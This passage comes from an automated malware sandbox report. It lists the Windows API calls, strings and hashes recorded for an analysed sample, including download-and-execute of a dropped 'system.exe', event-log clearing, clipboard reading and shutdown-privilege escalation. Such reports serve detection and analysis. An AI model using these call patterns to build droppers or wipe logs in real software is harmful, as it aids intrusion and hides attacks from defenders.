                                                                      • Part of subcall function 1000A5CC: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                      • Part of subcall function 1000A5CC: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                      • Part of subcall function 1000A5CC: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    • lstrlenA.KERNEL32(?), ref: 1000592A
                                                                    • strstr.MSVCRT ref: 10005940
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 10005950
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005996
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$memset$Library$CreateFreeLoadOpenProcesslstrcpylstrlenstrlenstrstr
                                                                    • String ID: Applications\iexplore.exe\shell\open\command$D
                                                                    • API String ID: 1789527446-535818822
                                                                    • Opcode ID: 03b04116cd5e2f93a1c388b574af25df78561291c4e5abe51a4331dc8cba65a8
                                                                    • Instruction ID: ade4a931f4eb9cfd1acdee13523752f519e6b6ecf5cf36e0ff3093b8eebf7cde
                                                                    • Opcode Fuzzy Hash: 03b04116cd5e2f93a1c388b574af25df78561291c4e5abe51a4331dc8cba65a8
                                                                    • Instruction Fuzzy Hash: C7216072801228EAEB50DBE1DD48EDF7BBCEF453E2F100015FA05E6144DB759A85CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event
                                                                    • String ID:
                                                                    • API String ID: 4201588131-0
                                                                    • Opcode ID: fdab10a5c90b270ad0079631d783d4541f4e1c69ab3289e713f8659d37ba98c0
                                                                    • Instruction ID: 8fbbc46a2082f07138499ad3a4712ab5100e6d4067e54ab912e002d1de0c6dee
                                                                    • Opcode Fuzzy Hash: fdab10a5c90b270ad0079631d783d4541f4e1c69ab3289e713f8659d37ba98c0
                                                                    • Instruction Fuzzy Hash: C201CE326053652EF7203BA28C89EAF6B58DF47350F14403BF401A22D3CA7C4C42866F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event
                                                                    • String ID:
                                                                    • API String ID: 4201588131-0
                                                                    • Opcode ID: fe4cecb07c818d34fbfdaafa4c52fc3d38e475ee1d7a847f0df858aff16f7476
                                                                    • Instruction ID: 7fceb321a988616d5766c36d8bb7e4aa9e85438ef3f497565498da9765883d79
                                                                    • Opcode Fuzzy Hash: fe4cecb07c818d34fbfdaafa4c52fc3d38e475ee1d7a847f0df858aff16f7476
                                                                    • Instruction Fuzzy Hash: E701A1396043556FF700A7A08C89EDB7BA9DF472D1F21802AF4429205ACF606E428777
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 00409486
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004094D7
                                                                    • _mbscat.MSVCRT ref: 00409512
                                                                    • strlen.MSVCRT ref: 0040951E
                                                                    • memcpy.MSVCRT(100141A0,?,00000000,?,?,10012020), ref: 00409532
                                                                    • strlen.MSVCRT ref: 0040953E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$FileFindFirstFolderPathSpecial_mbscatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2947873918-0
                                                                    • Opcode ID: 49c7611cb49c1076721328d6f5764eb3c50a8c270976e230460b00990371f405
                                                                    • Instruction ID: b03a09a5f11923434ba7b1c586fecbcb86196ef0a9c8f209275e8ba57841d971
                                                                    • Opcode Fuzzy Hash: 49c7611cb49c1076721328d6f5764eb3c50a8c270976e230460b00990371f405
                                                                    • Instruction Fuzzy Hash: 372177B390021C6BDB22D7A5CD45FDE777CEB08704F0404E7E709E6151EA749B988E61
                                                                    APIs
                                                                    • OpenClipboard.USER32(00000000), ref: 004093E9
                                                                    • GetClipboardData.USER32(00000001), ref: 004093F7
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409400
                                                                    • strlen.MSVCRT ref: 0040941F
                                                                      • Part of subcall function 0040EA57: __EH_prolog.LIBCMT ref: 0040EA5C
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00409447
                                                                    • CloseClipboard.USER32 ref: 0040944D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$CloseDataH_prologLockOpenUnlockstrlen
                                                                    • String ID:
                                                                    • API String ID: 934611190-0
                                                                    • Opcode ID: 5976a31b03ba9f18f11c0af247b37153e61dae78ef3d8ecbc8a77992907040de
                                                                    • Instruction ID: 32d50112ce0f58068e201b69a4405065d4eff6813b7af1f08ebd6762c0c446dc
                                                                    • Opcode Fuzzy Hash: 5976a31b03ba9f18f11c0af247b37153e61dae78ef3d8ecbc8a77992907040de
                                                                    • Instruction Fuzzy Hash: D201A77250061DABD701FBA58D89DEF776CAF05340F100036F905F6192DAB48E018665
                                                                    APIs
                                                                    • URLDownloadToFileA.URLMON(00000000,10013F98,C:\Program Files\Windows NT\system.exe,00000000,00000000), ref: 0041201D
                                                                    • ShellExecuteA.SHELL32(00000000,10013F90,C:\Program Files\Windows NT\system.exe,00000000,00000000,00000005), ref: 0041202D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadExecuteFileShell
                                                                    • String ID: C:\Program Files\Windows NT\system.exe
                                                                    • API String ID: 2825088817-3774349005
                                                                    • Opcode ID: 8bf73eb6518c50b26927ebb68a85bcd77e84970b3874e1b07d45aec87177b45d
                                                                    • Instruction ID: 0d6a2648eb453b0ce98d4848acc32a75357771999e1b86e2559aea8d1fcb36bb
                                                                    • Opcode Fuzzy Hash: 8bf73eb6518c50b26927ebb68a85bcd77e84970b3874e1b07d45aec87177b45d
                                                                    • Instruction Fuzzy Hash: 3FD0C9329892A079E63196575C4DFDB8F3CCBE3F76F01402EF608A9094866444C3C1B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $9$B
                                                                    • API String ID: 0-1781792629
                                                                    • Opcode ID: f672ade51884d069c4a54aef30150efd2d19954300f8f72b609cbbf482c34c1d
                                                                    • Instruction ID: 103464f29d6001f202aede889a08756a5345d7d14b572a5bb7bdd36765da840b
                                                                    • Opcode Fuzzy Hash: f672ade51884d069c4a54aef30150efd2d19954300f8f72b609cbbf482c34c1d
                                                                    • Instruction Fuzzy Hash: 8CB27875910225CFCB24DFA8DC98BA9B7B4FF48304F1441EAE849EB695E7749A80CF50
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB19
                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040EB20
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateProcessmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1874444438-0
                                                                    • Opcode ID: 6dbfd03899ba3ae6164cf4c1722507dcc2085d6c44deb96f3b2530c0f62249ab
                                                                    • Instruction ID: db4c6275b102b35ac819af81fd1a7e9ada2f6da87839288294dfd554a0a9ff74
                                                                    • Opcode Fuzzy Hash: 6dbfd03899ba3ae6164cf4c1722507dcc2085d6c44deb96f3b2530c0f62249ab
                                                                    • Instruction Fuzzy Hash: CD314F71604305BBE714DBAACD85E6B7BB8EF48754F10082AF605E7281E7B4E950CB68
                                                                    APIs
                                                                    • OpenEventLogA.ADVAPI32(00000000,10012C28), ref: 0040D323
                                                                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 0040D332
                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 0040D339
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$ClearCloseOpen
                                                                    • String ID:
                                                                    • API String ID: 1391105993-0
                                                                    • Opcode ID: a3796a531c2d6939b6cb66e9ecac668b55f7ec04d20b5c5025b794f63da832aa
                                                                    • Instruction ID: 83a536ee640a8c4d2cd0e35a6a73fdd5cd5d87576876f39e984368768e95af3b
                                                                    • Opcode Fuzzy Hash: a3796a531c2d6939b6cb66e9ecac668b55f7ec04d20b5c5025b794f63da832aa
                                                                    • Instruction Fuzzy Hash: E601B5B1D00659EFCB118FD4844169EBF70EB44780F904066E901FF290E738CA54CBA6
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(10013D74,1000C074,00000004,0040FD4E,?,?,?), ref: 0040FB77
                                                                    • GetProcAddress.KERNEL32(00000000,10013D5C), ref: 0040FB89
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040FBAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 145871493-0
                                                                    • Opcode ID: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction ID: 36b1297db314b87aaea9300f960fe1d514b4e5f075a2a00539dbdff1862d12a1
                                                                    • Opcode Fuzzy Hash: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction Fuzzy Hash: AAE09232100221E6E6215B55FC59E9BBFB4EFC1B91B008039F901A2254C739D845C672
                                                                    APIs
                                                                      • Part of subcall function 004122BA: CloseHandle.KERNEL32(?), ref: 0041236C
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0040D273
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseExitHandleWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 1537235944-3733053543
                                                                    • Opcode ID: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction ID: a791884de0bec06d00372dc062b64136ba0344cea476d1598949c07085dc0f0a
                                                                    • Opcode Fuzzy Hash: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction Fuzzy Hash: B1D0C93315D7207DF51923107D07FCE2385AB09721F30408FF604681D19AEA2A91419D
                                                                    APIs
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A286
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000A296
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000A2A1
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000A2AC
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A2B6
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000A2C1
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000A309
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000A311
                                                                      • Part of subcall function 1000A26E: CloseHandle.KERNEL32(?), ref: 1000A320
                                                                      • Part of subcall function 1000A26E: FreeLibrary.KERNEL32(00000000), ref: 1000A331
